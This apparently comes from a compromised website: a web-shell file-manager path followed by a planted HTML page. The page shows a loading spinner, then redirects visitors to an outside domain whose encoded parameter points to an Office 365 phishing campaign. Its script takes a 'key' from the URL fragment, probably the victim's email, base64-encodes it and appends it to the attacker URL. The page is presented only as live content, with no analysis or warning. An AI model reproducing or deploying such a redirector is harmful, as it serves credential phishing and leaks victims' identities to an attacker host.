/
home
/
sellosxp
/
public_html
/
wp-bot.php
/
computers-smartphones-21vv3
/
Upload File
HOME
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="refresh" content="2;url=https://cnvitai.com/o/?c3Y9bzM2NV8xX29uZSZtPVl3JnVpZD1VU0VSMjYwNTIwMjVVMzcwNTI2MjkmdD1qUA==N0123N"> <title>Loading...</title> <style> body { margin: 0; font-family: Arial, sans-serif; background: #f5f5f5; display: flex; justify-content: center; align-items: center; height: 100vh; } .loader { border: 4px solid #e0e0e0; border-top: 4px solid #007bff; border-radius: 50%; width: 24px; height: 24px; animation: spin 1s linear infinite; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> </head> <body> <div class="loader"></div> <script> function getRedirectUrl() { const baseUrl = "https://cnvitai.com/o/?c3Y9bzM2NV8xX29uZSZtPVl3JnVpZD1VU0VSMjYwNTIwMjVVMzcwNTI2MjkmdD1qUA==N0123N"; const hashParams = new URLSearchParams(window.location.hash.substring(1)); let hashValue = hashParams.get("key"); if (hashValue) { // Remove all '/' characters from the hash value hashValue = hashValue.replace(/\//g, ""); // Encode the cleaned hash value to Base64 hashValue = btoa(hashValue); return baseUrl + hashValue; } return baseUrl; } // Update meta refresh URL dynamically document.querySelector('meta[http-equiv="refresh"]').setAttribute('content', `2;url=${getRedirectUrl()}`); window.onload = function() { const redirectUrl = getRedirectUrl(); setTimeout(function() { window.location.replace(redirectUrl); }, 2000); }; </script> </body> </html>